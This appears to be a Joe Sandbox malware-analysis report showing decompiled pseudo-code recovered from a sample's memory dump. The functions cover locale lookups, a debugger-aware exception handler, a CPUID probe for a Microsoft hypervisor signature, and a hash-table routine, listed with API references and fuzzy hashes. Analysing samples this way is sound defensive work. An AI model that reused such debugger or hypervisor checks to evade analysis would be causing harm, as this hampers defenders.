0x00cf7952
0x00cf77fd
0x00cf77fd
0x00cf7807
0x00cf780a
0x00cf7811
0x00cf7814
0x00cf7816
0x00cf7817
0x00cf781c
0x00cf781c
0x00000000
0x00cf7814
0x00cf777b
0x00cf777b
0x00cf777d
0x00cf7782
0x00000000
0x00cf7784
0x00cf7784
0x00cf7790
0x00cf7798
0x00cf779d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf779d
0x00cf7834
0x00cf781f
0x00cf782f
0x00cf7836
0x00000000
0x00cf7836
0x00cf7834
0x00cf7782
0x00000000

Strings

!empty(), xrefs: 00CF7840
%s:%d: assertion %s failed: %s, xrefs: 00CF784F
back() called on an empty vector, xrefs: 00CF783B
..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00CF784A

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID: !empty()$%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\vector$back() called on an empty vector
API String ID: 0-1047145689
Opcode ID: 67c78f1d7697399874710dde3221e7c912eae85a790302d4dbf40ace5c0f9ca6
Instruction ID: 5221d8e76953519a6cf430ec98cc6e1c9da3d443654849f57596d689ee15ebe9
Opcode Fuzzy Hash: 67c78f1d7697399874710dde3221e7c912eae85a790302d4dbf40ace5c0f9ca6
Instruction Fuzzy Hash: 05513A75B0420D8BC7609F19D884A7AB3E6EB90300B64863DEA57EB345E771FE01C792

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A530 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00D1A530(void* __ecx, signed char __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				intOrPtr _t80;
				void* _t89;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t140;

				_t121 = __edx;
				_t50 =  *0xd40014; // 0xfbddd969
				_v8 = _t50 ^ _t127;
				_t125 = _a4;
				_t94 = E00D155BA(__ecx, __edx, _a4);
				_t124 =  *(E00D155BA(__ecx, __edx, _a4) + 0x34c);
				_t126 = L00D1AB2B(_t125);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					L38:
					return E00CFE643(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E00D100FF( *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E00D100FF( *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						if( *(_t94 + 0x60) == 0 &&  *((intOrPtr*)(_t94 + 0x5c)) != 0 && E00D100FF( *((intOrPtr*)(_t94 + 0x50)),  &_v248) == 0) {
							_push(_t124);
							_t94 = 0;
							if(E00D1AABD(_t126, 0) == 0) {
								goto L36;
							}
							 *_t124 =  *_t124 | 0x00000100;
							L34:
							if(_t140 == 0) {
								_t124[1] = _t126;
							}
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						if( *((intOrPtr*)(_t94 + 0x5c)) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						if(_t122 - _v256 >> 1 !=  *((intOrPtr*)(_t94 + 0x5c))) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						if(E00D1AABD(_t126, 1) == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t140 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E00D100FF( *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					if( *((intOrPtr*)(_t94 + 0x5c)) == 0) {
						L12:
						_t121 =  *_t124;
						if((_t121 & 0x00000001) != 0 || E00D1AA98(_t126) == 0) {
							goto L16;
						} else {
							 *_t124 = _t121;
							goto L15;
						}
					}
					_t92 = L00D1027C( *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *((intOrPtr*)(_t94 + 0x5c)));
					_t128 = _t128 + 0xc;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
					} while (_t93 != _v252);
					if(_t117 - _t121 >> 1 ==  *((intOrPtr*)(_t94 + 0x5c))) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}

0x00d1a530
0x00d1a53b
0x00d1a542
0x00d1a547
0x00d1a550
0x00d1a558
0x00d1a567
0x00d1a573
0x00d1a584
0x00d1a58a
0x00d1a593
0x00d1a76d
0x00d1a76f
0x00d1a771
0x00d1a772
0x00d1a780
0x00d1a780
0x00d1a5ac
0x00d1a667
0x00d1a672
0x00d1a761
0x00d1a768
0x00000000
0x00d1a768
0x00d1a686
0x00d1a69c
0x00000000
0x00000000
0x00d1a6ac
0x00d1a6b5
0x00d1a726
0x00d1a742
0x00d1a743
0x00d1a751
0x00000000
0x00000000
0x00d1a753
0x00d1a75c
0x00d1a75c
0x00d1a75e
0x00d1a75e
0x00d1a75c
0x00000000
0x00d1a726
0x00d1a6b9
0x00d1a6bf
0x00d1a6c4
0x00d1a6d9
0x00000000
0x00000000
0x00d1a6db
0x00d1a6e1
0x00d1a6e7
0x00d1a6e7
0x00d1a6ea
0x00d1a6ed
0x00d1a6fc
0x00d1a701
0x00d1a71d
0x00000000
0x00d1a71d
0x00d1a703
0x00d1a711
0x00000000
0x00000000
0x00d1a713
0x00d1a719
0x00d1a6ce
0x00d1a6ce
0x00000000
0x00d1a6ce
0x00d1a6c6
0x00d1a6cc
0x00000000
0x00d1a6cc
0x00d1a5c0
0x00d1a5d6
0x00000000
0x00000000
0x00d1a5e6
0x00d1a5ed
0x00d1a5f1
0x00d1a603
0x00000000
0x00000000
0x00d1a609
0x00d1a64d
0x00d1a64d
0x00d1a652
0x00000000
0x00d1a65f
0x00d1a662
0x00000000
0x00d1a662
0x00d1a652
0x00d1a618
0x00d1a61d
0x00d1a622
0x00000000
0x00000000
0x00d1a624
0x00d1a627
0x00d1a62a
0x00d1a62d
0x00d1a630
0x00d1a630
0x00d1a633
0x00d1a636
0x00d1a646
0x00d1a648
0x00d1a648
0x00d1a5f3
0x00d1a5f9
0x00d1a5fc
0x00d1a664
0x00d1a664
0x00d1a664

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D1A584
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D1A5CE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D1A694

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 03e443ac3a72109f549330a6f5009ec0d960a4a8c602f21d378a0416cd60a439
Instruction ID: 9aa93bb7bd491d00ee98e746ccef581671ae6c520da5ad16c42ebc2bb86d1295
Opcode Fuzzy Hash: 03e443ac3a72109f549330a6f5009ec0d960a4a8c602f21d378a0416cd60a439
Instruction Fuzzy Hash: 9961AF71511607ABEB289F28ED86BFA77B8EF04300F18416AE905C6185EF74DAC4DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D170E0 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00D170E0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xd40014; // 0xfbddd969
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00CFE202(_t41);
					_pop(_t61);
				}
				E00D011A0(_t66,  &_v804, 0, 0x50);
				E00D011A0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00CFE202(_t57);
				}
				return E00CFE643(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00d170e0
0x00d170e0
0x00d170e0
0x00d170eb
0x00d170f0
0x00d170f2
0x00d170fa
0x00d170fc
0x00d170ff
0x00d17104
0x00d17104
0x00d17110
0x00d17123
0x00d17131
0x00d17137
0x00d1713d
0x00d17143
0x00d17149
0x00d1714f
0x00d17155
0x00d1715b
0x00d17161
0x00d17167
0x00d1716e
0x00d17175
0x00d1717c
0x00d17183
0x00d1718a
0x00d17191
0x00d17192
0x00d1719b
0x00d171a1
0x00d171a4
0x00d171aa
0x00d171b7
0x00d171c0
0x00d171c9
0x00d171d2
0x00d171e0
0x00d171e2
0x00d171f7
0x00d17203
0x00d17206
0x00d1720b
0x00d17218

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D171D8
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D171E2
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D171EF

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1882a8d67cdc27f6d92ef0a349bb6416742e95f70a2be7ef98f26cbfd3b7cfa5
Instruction ID: 0b092dff7b994506fd3aa0853d55c3cc9c70b42f0d5dc1ebefd586afd1f0739f
Opcode Fuzzy Hash: 1882a8d67cdc27f6d92ef0a349bb6416742e95f70a2be7ef98f26cbfd3b7cfa5
Instruction Fuzzy Hash: 7331C27490131CABCB21DF68DC89BCDBBB8AF08310F5041DAE51CA72A1EB709B858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00CFB5D0 Relevance: 3.9, Strings: 3, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 38%

			E00CFB5D0(intOrPtr* __ecx, signed char __edx) {
				unsigned int _v20;
				intOrPtr* _v24;
				signed int _t63;
				signed int _t64;
				intOrPtr* _t75;
				signed int _t76;
				signed int _t79;
				signed char _t85;
				unsigned int _t88;

				_t84 = __edx;
				_t90 = __ecx;
				asm("cpuid");
				if(0 > 0) {
					_v24 = __ecx;
					asm("cpuid");
					_v20 = 0;
					_t68 = 0;
					if(0 >= 7) {
						asm("cpuid");
						_t84 = __edx;
						_t68 = 0;
					}
					_t75 = _v24;
					 *_t75 = 1;
					 *((intOrPtr*)(_t75 + 8)) = 1;
					 *((intOrPtr*)(_t75 + 4)) = 1;
					_t90 = _t75;
					 *(_t75 + 0xc) = _t84 >> 0x00000017 & 0x00000001;
					 *(_t75 + 0xd) = _t84 >> 0x00000019 & 0x00000001;
					 *(_t75 + 0xe) = _t84 >> 0x0000001a & 0x00000001;
					_t76 = _v20;
					 *(_t90 + 0xf) = _t76 & 0x00000001;
					 *(_t90 + 0x10) = _t76 >> 0x00000009 & 0x00000001;
					 *(_t90 + 0x11) = _t76 >> 0x00000013 & 0x00000001;
					 *(_t90 + 0x12) = _t76 >> 0x00000014 & 0x00000001;
					 *(_t90 + 0x13) = _t76 >> 0x00000017 & 0x00000001;
					 *((char*)(_t90 + 0x19)) = _t76 >> 0x1f;
					_t63 =  !_t76;
					if((_t63 & 0x1c000000) != 0) {
						_t64 = 0;
					} else {
						asm("xgetbv");
						_t64 =  !_t63 & 0xffffff00 | ( !_t63 & 0x00000006) == 0x00000000;
					}
					 *(_t90 + 0x14) = _t64;
					_t88 = _v20;
					_t79 = _t88 >> 0x00000019 & 0x00000001;
					 *(_t90 + 0x17) = _t79;
					_t84 = _t88 >> 0x0000000c & 0x00000001;
					 *(_t90 + 0x15) = _t84;
					 *(_t90 + 0x16) = (_t79 & 0xffffff00 | _t68 != 0x00000000) & (_t64 & 0xffffff00 | _t64 != 0x00000000);
				}
				_t36 = 0x80000000;
				asm("cpuid");
				if(0x80000000 <= 0x80000006) {
					_t85 =  *(_t90 + 0x18);
					if(_t85 == 0) {
						goto L11;
					}
				} else {
					_t36 = 0x80000007;
					asm("cpuid");
					_t85 = _t84 & 0x00000001;
					 *(_t90 + 0x18) = _t85;
					if(_t85 == 0) {
						L11:
						if( *((char*)(_t90 + 0x19)) != 0) {
							_t36 = 0x40000000;
							asm("cpuid");
							if(_t68 == 0x7263694d && 0 == 0x666f736f && _t85 == 0x76482074) {
								 *(_t90 + 0x18) = 1;
								return 0x40000000;
							}
						}
					}
				}
				return _t36;
			}

0x00cfb5d0
0x00cfb5d9
0x00cfb5df
0x00cfb5e3
0x00cfb5eb
0x00cfb5f5
0x00cfb5f7
0x00cfb5ff
0x00cfb604
0x00cfb60f
0x00cfb611
0x00cfb613
0x00cfb613
0x00cfb616
0x00cfb619
0x00cfb620
0x00cfb629
0x00cfb62c
0x00cfb635
0x00cfb63f
0x00cfb648
0x00cfb64b
0x00cfb652
0x00cfb65c
0x00cfb666
0x00cfb670
0x00cfb67a
0x00cfb682
0x00cfb687
0x00cfb68e
0x00cfb69e
0x00cfb690
0x00cfb692
0x00cfb699
0x00cfb699
0x00cfb6a0
0x00cfb6a3
0x00cfb6ab
0x00cfb6ae
0x00cfb6b4
0x00cfb6b7
0x00cfb6c6
0x00cfb6c6
0x00cfb6c9
0x00cfb6d0
0x00cfb6d7
0x00cfb6ee
0x00cfb6f3
0x00000000
0x00000000
0x00cfb6d9
0x00cfb6d9
0x00cfb6e0
0x00cfb6e2
0x00cfb6e5
0x00cfb6ea
0x00cfb6f5
0x00cfb6f9
0x00cfb6fb
0x00cfb702
0x00cfb70a
0x00cfb71c
0x00000000
0x00cfb71c
0x00cfb70a
0x00cfb6f9
0x00cfb6ea
0x00cfb727

Strings

Micr, xrefs: 00CFB704
osof, xrefs: 00CFB70C
t Hv, xrefs: 00CFB714

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID: Micr$osof$t Hv
API String ID: 0-2053847325
Opcode ID: d5d9e0e05a2c30fc61a8331b182233f90f795c872c5ebd243d906a29780eb6ce
Instruction ID: 08909782a746cac73746f4f4657a54de249f271ed309d78cf921eb408653ee90
Opcode Fuzzy Hash: d5d9e0e05a2c30fc61a8331b182233f90f795c872c5ebd243d906a29780eb6ce
Instruction Fuzzy Hash: 6C414C72B1868B5BD74D893C84413B9AB629B71318F18826ED844CB343CB57EF96C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00C998D4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 229
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E00C998D4(signed int __ecx, void* __eflags, intOrPtr __fp0, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v20;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t94;
				signed int _t102;
				signed int _t104;
				signed int _t106;
				signed int _t109;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t123;
				signed int _t127;
				signed int _t133;
				signed int _t134;
				intOrPtr* _t135;
				signed int _t138;
				signed int _t139;
				signed int* _t144;
				signed int _t158;
				signed int _t161;
				signed int _t166;
				signed int _t167;
				signed int _t169;
				signed int _t171;
				signed int _t174;
				signed int _t183;
				intOrPtr* _t184;
				signed int _t185;
				signed int* _t187;
				unsigned int _t190;
				signed int _t191;
				intOrPtr _t206;

				_t206 = __fp0;
				_t183 = __ecx;
				_t94 =  *0xd40014; // 0xfbddd969
				_v20 = _t94 ^ _t191;
				_v36 = E00C96AF8(_a8);
				_t133 =  *(_t183 + 4);
				_t161 = 0xffffffffffffffff;
				if(_t133 == 0) {
					L18:
					_v40 = _t161;
					_t138 = _t183;
					_t184 =  &_v32;
					 *((intOrPtr*)(_t184 + 8)) = 0xffffffffffffffff;
					 *((intOrPtr*)(_t184 + 4)) = 0xffffffffffffffff;
					 *_t184 = 0xffffffffffffffff;
					_push(_a20);
					_t185 = _t138;
					L00C99B3C(_t138, _t206, _t184, _v36, _a12, _a16);
					asm("movq xmm2, [0xd30dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [edi+0x10]");
					__eflags = _t133;
					if(__eflags == 0) {
						L21:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t102 = E00D236A0(_t138);
						_v56 = _t206;
						asm("movss xmm0, [ebp-0x34]");
						asm("cvttss2si ecx, xmm0");
						asm("subss xmm0, [0xd30dd8]");
						asm("cvttss2si eax, xmm0");
						_t104 = _t102 & _t138 >> 0x0000001f | _t138;
						_t139 = _t133 + _t133;
						__eflags = _t133 - 3;
						if(_t133 < 3) {
							_t166 = 1;
							__eflags = 1;
						} else {
							_t49 = _t133 - 1; // -1
							__eflags = _t133 & _t49;
							_t166 = 0 | (_t133 & _t49) != 0x00000000;
						}
						_t187 = _a4;
						_t167 = _t166 | _t139;
						__eflags = _t167 - _t104;
						_t168 =  <=  ? _t104 : _t167;
						E00C994B2(_t185, _t206,  <=  ? _t104 : _t167);
						_t133 =  *(_t185 + 4);
						_t56 = _t133 - 1; // -1
						_t169 = _t56;
						__eflags = _t133 & _t169;
						if((_t133 & _t169) != 0) {
							_t106 = _v36;
							__eflags = _t106 - _t133;
							if(_t106 >= _t133) {
								_t62 = _t106 % _t133;
								__eflags = _t62;
								_t171 = _t62;
							} else {
								_t171 = _t106;
							}
						} else {
							_t171 = _t169 & _v36;
						}
						L29:
						_t109 =  *( *_t185 + _t171 * 4);
						__eflags = _t109;
						if(_t109 == 0) {
							_v36 = _t185 + 8;
							 *_v32 =  *((intOrPtr*)(_t185 + 8));
							 *((intOrPtr*)(_t185 + 8)) = _v32;
							_t173 = _v36;
							 *( *_t185 + _t171 * 4) = _v36;
							_t144 = _v32;
							_t112 =  *_t144;
							__eflags = _t112;
							if(_t112 != 0) {
								_t116 =  *(_t112 + 4);
								_t80 = _t133 - 1; // -1
								_t174 = _t80;
								__eflags = _t133 & _t174;
								if((_t133 & _t174) != 0) {
									__eflags = _t116 - _t133;
									if(_t116 >= _t133) {
										_t84 = _t116 % _t133;
										__eflags = _t84;
										_t116 = _t84;
									}
								} else {
									_t116 = _t116 & _t174;
								}
								_t173 =  *_t185;
								 *( *_t185 + _t116 * 4) = _t144;
							}
						} else {
							_t173 = _v32;
							 *_v32 =  *_t109;
							 *_t109 = _v32;
						}
						_t134 = _v32;
						_t90 = _t185 + 0xc;
						 *_t90 =  *(_t185 + 0xc) + 1;
						__eflags =  *_t90;
						_t113 = 1;
						goto L38;
					}
					asm("movd xmm3, ebx");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags > 0) {
						goto L21;
					}
					_t187 = _a4;
					_t171 = _v40;
					goto L29;
				} else {
					_t190 = (((_t133 - (_t133 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t133 - (_t133 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t133 - (_t133 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t133 - (_t133 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
					if(_t190 > 1) {
						_t123 = _v36;
						_t161 = _t123;
						__eflags = _t123 - _t133;
						if(_t123 >= _t133) {
							_t10 = _v36 % _t133;
							__eflags = _t10;
							_t161 = _t10;
						}
					} else {
						_t5 = _t133 - 1; // -1
						_t161 = _t5 & _v36;
					}
					_v44 = _t133;
					_t135 =  *((intOrPtr*)( *_t183 + _t161 * 4));
					if(_t135 == 0) {
						_t133 = _v44;
						goto L18;
					}
					_v40 = _t161;
					_v52 = _v44 - 1;
					_v48 = _t183;
					_t185 = _t183 + 0x14;
					while(1) {
						_t135 =  *_t135;
						if(_t135 == 0) {
							break;
						}
						_t127 =  *(_t135 + 4);
						if(_t127 == _v36) {
							L14:
							if(L00C96B8C(_t135 + 8, _a8) == 0) {
								continue;
							}
							_t113 = 0;
							_t187 = _a4;
							L38:
							 *_t187 = _t134;
							_t187[1] = _t113;
							E00CFE643(_t113, _t134, _v20 ^ _t191, _t173, _t185, _t187);
							return _t187;
						}
						if(_t190 > 1) {
							_t158 = _v44;
							__eflags = _t127 - _t158;
							if(_t127 >= _t158) {
								_t25 = _t127 % _t158;
								__eflags = _t25;
								_t173 = _t25;
								_t127 = _t25;
							}
						} else {
							_t127 = _t127 & _v52;
						}
						if(_t127 != _v40) {
							break;
						} else {
							goto L14;
						}
					}
					_t183 = _v48;
					_t133 = _v44;
					_t161 = _v40;
					goto L18;
				}
			}

0x00c998d4
0x00c998dd
0x00c998df
0x00c998e6
0x00c998f4
0x00c998f7
0x00c998fc
0x00c998ff
0x00c999c8
0x00c999c8
0x00c999d1
0x00c999d3
0x00c999d9
0x00c999dc
0x00c999df
0x00c999e1
0x00c999ea
0x00c999ec
0x00c999f5
0x00c999fd
0x00c99a01
0x00c99a05
0x00c99a09
0x00c99a0d
0x00c99a12
0x00c99a14
0x00c99a3d
0x00c99a3d
0x00c99a41
0x00c99a48
0x00c99a4d
0x00c99a55
0x00c99a58
0x00c99a5d
0x00c99a66
0x00c99a6e
0x00c99a74
0x00c99a76
0x00c99a79
0x00c99a7c
0x00c99a8c
0x00c99a8c
0x00c99a7e
0x00c99a7e
0x00c99a83
0x00c99a85
0x00c99a85
0x00c99a8d
0x00c99a90
0x00c99a92
0x00c99a94
0x00c99a9a
0x00c99a9f
0x00c99aa2
0x00c99aa2
0x00c99aa5
0x00c99aa7
0x00c99aae
0x00c99ab1
0x00c99ab3
0x00c99abb
0x00c99abb
0x00c99abb
0x00c99ab5
0x00c99ab5
0x00c99ab5
0x00c99aa9
0x00c99aa9
0x00c99aa9
0x00c99abd
0x00c99abf
0x00c99ac2
0x00c99ac4
0x00c99ad7
0x00c99ae2
0x00c99ae7
0x00c99aec
0x00c99aef
0x00c99af2
0x00c99af5
0x00c99af7
0x00c99af9
0x00c99afb
0x00c99afe
0x00c99afe
0x00c99b01
0x00c99b03
0x00c99b09
0x00c99b0b
0x00c99b0f
0x00c99b0f
0x00c99b11
0x00c99b11
0x00c99b05
0x00c99b05
0x00c99b05
0x00c99b13
0x00c99b15
0x00c99b15
0x00c99ac6
0x00c99ac8
0x00c99acb
0x00c99ad0
0x00c99ad0
0x00c99b18
0x00c99b1b
